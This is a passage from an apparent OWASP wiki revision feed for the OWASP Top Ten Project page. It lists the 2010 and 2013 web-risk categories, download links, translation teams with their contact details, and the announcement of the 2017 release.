We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The 2017 RC1 has been rejected. There will be an RC2 coming out shortly. As RC2 may have significant changes from RC1, we suggest that you wait for RC2 before continuing your translation efforts. &lt;br /&gt;
&lt;br /&gt;
If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please email owasp-topten@lists.owasp.org to let us know that you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/drafts/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint].  &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
* Italian 2013: [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian PDF] Translated by: Michele Saporito: m.saporito7@gmail.com, Paolo Perego: thesp0nge@owasp.org, Matteo Meucci: matteo.meucci@owasp.org, Sara Gallo: sara.gallo@gmail.com, Alessandro Guido: alex@securityaddicted.com, Mirko Guido Spezie: mirko@dayu.it, Giuseppe Di Cesare: giuseppe.dicesare@alice.it, Paco Schiaffella: schiaffella@gmail.com, Gianluca Grasso: giandou@gmail.com, Alessio D'Ospina: alessiodos@gmail.com, Loredana Mancini: loredana.mancini@business-e.it, Alessio Petracca: alessio.petracca@gmail.com, Giuseppe Trotta: giutrotta@gmail.com, Simone Onofri: simone.onofri@gmail.com, Francesco Cossu: hambucker@gmail.com, Marco Lancini: marco.lancini.ml@gmail.com, Stefano Zanero: zanero@elet.polimi.it, Giovanni Schmid: giovanni.schmid@na.icar.cnr.it, Igor Falcomata': koba@sikurezza.org&lt;br /&gt;
*Japanese 2013: [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese PDF] Translated by: Chia-Lung Hsieh: ryusuke.tw(at)gmail.com, Reviewed by: Hiroshi Tokumaru, Takanori Nakanowatari&lt;br /&gt;
* Korean 2013: [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korean PDF] (이름가나다순) 김병효:byounghyo.kim@owasp.org, 김지원:jiwon.kim@owasp.or.kr, 김효근:katuri@katuri.kr, 박정훈:xelion@gmail.com, 성영모:youngmo.seong@owasp.or.kr, 성윤기:yune.sung@owasp.org, 송보영:boyoung.song@owasp.or.kr, 송창기:factor7@naver.com, 유정호:griphis77@gmail.com, 장상민:sangmin.jang@owasp.or.kr, 전영재:youngjae.jeon@owasp.org, 정가람:tgcarrot@gmail.com, 정홍순:jhs728@gmail.com, 조민재:johnny.cho@owasp.org,허성무:issimplenet@gmail.com&lt;br /&gt;
*Brazilian Portuguese 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese PDF] Translated by: Carlos Serrão, Marcio Machry, Ícaro Evangelista de Torres, Carlo Marcelo Revoredo da Silva, Luiz Vieira, Suely Ramalho de Mello, Jorge Olímpia, Daniel Quintão, Mauro Risonho de Paula Assumpção, Marcelo Lopes, Caio Dias, Rodrigo Gularte&lt;br /&gt;
*Spanish 2013: [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish PDF] Gerardo Canedo: gerardo.canedo@owasp.org, Jorge Correa: jacorream@gmail.com, Fabien Spychiger: fabien.spychiger@dreamlab.net, Alberto Hill: alberto.daniel.hill@gmail.com, Johnatan Stanley: johnatanst@gmail.com, Maximiliano Alonzo: malonzo@tib.com.uy, Mateo Martinez: mateo.martinez@owasp.org, David Montero: david.montero@owasp.org, Rodrigo Martinez: rodmart@fing.edu.uy, Guillermo Skrilec: guillermo.skrilec@owasp.org, Felipe Zipitria: felipe.zipitria@owasp.org, Fabien Spychiger: fabien.spychiger@dreamlab.net, Rafael Gil: rafael.gillarios@owasp.org, Christian Lopez: christian.lopez.martin@owasp.org, jonathan fernandez jonathan.fernandez04@gmail.com, Paola Rodriguez: Paola_R1@verifone.com, Hector Aguirre: hector.antonio.aguirre@owasp.org, Roger Carhuatocto: rcarhuatocto@intix.info, Juan Carlos Calderon: johnccr@yahoo.com, Marc Rivero López: mriverolopez@gmail.com, Carlos Allendes: carlos.allendes@owasp.org, daniel@carrero.cl: daniel@carrero.cl, Manuel Ramírez: manuel.ramirez.s@gmail.com, Marco Miranda: marco.miranda@owasp.org, Mauricio D. Papaleo Mayada: mpapaleo@gmail.com, Felipe Sanchez: felipe.sanchez@peritajesinformaticos.cl, Juan Manuel Bahamonde: juanmanuel.bahamonde@gmail.com, Adrià Massanet: adriamassanet@gmail.com, Jorge Correa: jacorream@gmail.com, Ramiro Pulgar: ramiro.pulgar@owasp.org, German Alonso Suárez Guerrero: german.suarez@owasp.org, Jose A. Guasch: jaguasch@gmail.com, Edgar Salazar: edgar.salazar@owasp.org&lt;br /&gt;
*Ukrainian 2013: [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian PDF] Kateryna Ovechenko, Yuriy Fedko, Gleb Paharenko, Yevgeniya Maskayeva, Sergiy Shabashkevich, Bohdan Serednytsky&lt;br /&gt;
&lt;br /&gt;
2010 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
*Korean 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF] Hyungkeun Park, (mirrk1@gmail.com)&lt;br /&gt;
*Spanish 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF] *Daniel Cabezas Molina , Edgar Sanchez, Juan Carlos Calderon, Jose Antonio Guasch, Paulo Coronado, Rodrigo Marcos, Vicente Aguilera&lt;br /&gt;
*French 2010: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] ludovic.petit@owasp.org, sebastien.gioria@owasp.org, antonio.fontes@owasp.org, benoit.guerette@owasp.org, Jocelyn.aubert@owasp.org, Eric.Garreau@gemalto.com, Guillaume.Huysmans@gemalto.com &lt;br /&gt;
*German: [[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Tobias Glemser, Dr. Ingo Hanke, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
*Indonesian: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF] Tedi Heriyanto (coordinator), Lathifah Arief, Tri A Sundara, Zaki Akhmad&lt;br /&gt;
*Italian: [https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF] Simone Onofri, Paolo Perego, Massimo Biagiotti, Edoardo Viscosi, Salvatore Fiorillo, Roberto Battistoni, Loredana Mancini, Michele Nesta, Paco Schiaffella, Lucilla Mancini, Gerardo Di Giacomo, Valentino Squilloni&lt;br /&gt;
*Japanese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF] cecil.su@owasp.org, Dr. Masayuki Hisada, Yoshimasa Kawamoto, Ryusuke Sakamoto, Keisuke Seki, Shin Umemoto, Takashi Arima&lt;br /&gt;
*Chinese: [https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF] 感谢以下为中文版本做出贡献的翻译人员和审核人员: Rip Torn, 钟卫林, 高雯, 王颉, 于振东&lt;br /&gt;
*Vietnamese: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF] Translation lead by Cecil Su - Translation Team: Dang Hoang Vu, Nguyen Ba Tien, Nguyen Tang Hung, Luong Dieu Phuong, Huynh Thien Tam&lt;br /&gt;
*Hebrew: [[OWASP_Top10_Hebrew|OWASP Top 10 Hebrew Project]] -- [https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]. Lead by Or Katz, see translation page for list of contributors.&lt;br /&gt;
&lt;br /&gt;
= Project Details =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{:GPC_Project_Details/OWASP_Top10 | OWASP Project Identification Tab}}&lt;br /&gt;
&lt;br /&gt;
= Some Commercial &amp;amp; OWASP Uses of the Top 10 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Warning''': these articles have not been rated for accuracy by OWASP. Product companies should be extremely careful about claiming to &amp;quot;cover&amp;quot; or &amp;quot;ensure compliance&amp;quot; with the OWASP Top 10. The current state-of-the-art for automated detection (scanners and static analysis) and prevention (WAF) is nowhere near sufficient to claim adequate coverage of the issues in the Top 10. Nevertheless, using the Top 10 as a simple way to communicate security to end users is effective. &lt;br /&gt;
&lt;br /&gt;
;[https://blogs.microsoft.com/microsoftsecure/2008/05/01/sdl-and-the-owasp-top-ten/ Microsoft] &lt;br /&gt;
:as a way to measure the coverage of their SDL and improve security&lt;br /&gt;
&lt;br /&gt;
;[https://www.pcisecuritystandards.org/index.shtml PCI Council] &lt;br /&gt;
:as part of the Payment Card Industry Data Security Standard (PCI DSS)&lt;br /&gt;
&lt;br /&gt;
;[http://msdn.microsoft.com/en-us/library/dd129898.aspx Microsoft] &lt;br /&gt;
:to show how &amp;quot;T10 threats are handled by the security design and test procedures of Microsoft&amp;quot;&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_10/Mapping_to_WHID | OWASP]]&lt;br /&gt;
:OWASP Top 10 Mapped to the Web Hacking Incident Database&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Mobile_Security_Project#tab=Top_Ten_Mobile_Risks | OWASP]]&lt;br /&gt;
:OWASP Mobile Top 10 Risks&lt;br /&gt;
&lt;br /&gt;
;[[OWASP_Top_Ten_Cheat_Sheet | OWASP]]&lt;br /&gt;
:OWASP Top 10 Cheat Sheet&lt;br /&gt;
&lt;br /&gt;
__NOTOC__ &amp;lt;headertabs /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Category:OWASP_Project]] [[Category:OWASP_Document]] [[Category:OWASP_Download]] [[Category:OWASP_Release_Quality_Document]][[Category:Popular]][[Category:SAMM-EG-1]]&lt;/div&gt;</summary>
		<author><name>Neil Smithline</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235645</id>
		<title>Category:OWASP Top Ten Project</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Category:OWASP_Top_Ten_Project&amp;diff=235645"/>
				<updated>2017-11-20T16:33:36Z</updated>
		
		<summary type="html">&lt;p&gt;Neil Smithline: Push 2017 T10&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=Main=&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:90px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File: flagship_big.jpg|link=https://www.owasp.org/index.php/OWASP_Project_Stages#tab=Flagship_Projects]]&amp;lt;/div&amp;gt;&lt;br /&gt;
{| style=&amp;quot;padding: 0;margin:0;margin-top:10px;text-align:left;&amp;quot; |-&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;border-right: 1px dotted gray;padding-right:25px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== OWASP Top 10 2017 Released==&lt;br /&gt;
The [https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf OWASP Top 10 - 2017] is now available. &lt;br /&gt;
&lt;br /&gt;
==OWASP Top 10 Most Critical Web Application Security Risks==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
==Translation Efforts==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 has been translated to many different languages by numerous volunteers. These translations are available as follows:&lt;br /&gt;
&lt;br /&gt;
* 2017 translations are currently underway&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2013 | All versions of the OWASP Top 10 - 2013]]&lt;br /&gt;
* [[Top10#OWASP_Top_10_for_2010 | All versions of the OWASP Top 10 - 2010]]&lt;br /&gt;
* [[Top10#Translation_Efforts_2 | Information about the various translation teams]]&lt;br /&gt;
&lt;br /&gt;
== Related Projects ==&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Mobile_Security_Project#Top_Ten_Mobile_Risks | OWASP Mobile Top 10 Risks]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Top_Ten_Cheat_Sheet | OWASP Top 10 Cheat Sheet]]&lt;br /&gt;
&lt;br /&gt;
* [[OWASP_Proactive_Controls | Top 10 Proactive Controls]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2017 project is sponsored by &lt;br /&gt;
&lt;br /&gt;
{{MemberLinks|link=https://www.autodesk.com|logo=Autodesk-logo.png}}&lt;br /&gt;
&lt;br /&gt;
Thanks to [https://www.aspectsecurity.com Aspect Security] for sponsoring earlier versions.&lt;br /&gt;
&lt;br /&gt;
==Licensing==&lt;br /&gt;
The OWASP Top 10 is free to use. It is licensed under the [http://creativecommons.org/licenses/by-sa/4.0/ Creative Commons Attribution-ShareAlike 4.0 license].&lt;br /&gt;
&lt;br /&gt;
| valign=&amp;quot;top&amp;quot;  style=&amp;quot;padding-left:25px;width:200px;&amp;quot; |&lt;br /&gt;
&lt;br /&gt;
== Quick Download ==&lt;br /&gt;
* [[Media:OWASP_Top_10_2017_GM_(en).pdf | OWASP Top 10 2017 GM - PDF]]&lt;br /&gt;
* [[Media:OWASP_Top_10_-_2013.pdf | OWASP Top 10 2013 - PDF]]&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - wiki]]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation (PPTX)].&lt;br /&gt;
&lt;br /&gt;
== Get Involved ==&lt;br /&gt;
* [https://github.com/OWASP/Top10/issues Top 10 Issues on GitHub](preferred)&lt;br /&gt;
* [https://lists.owasp.org/mailman/listinfo/Owasp-topten Project Email List]&lt;br /&gt;
&lt;br /&gt;
== News and Events ==&lt;br /&gt;
* [20 Oct 2017] OWASP Top 10 2017 - RC2 Published&lt;br /&gt;
* [20 May 2016] OWASP Top 10 - 2017 Data Call Announced&lt;br /&gt;
* [12 Jun 2013] OWASP Top 10 - 2013 Final Released&lt;br /&gt;
&lt;br /&gt;
== Project Leaders ==&lt;br /&gt;
&lt;br /&gt;
* [[User:vanderaj | Andrew van der Stock]]&lt;br /&gt;
* [[User:Brianglas | Brian Glas]]&lt;br /&gt;
* [[User:Neil_Smithline | Neil Smithline]]&lt;br /&gt;
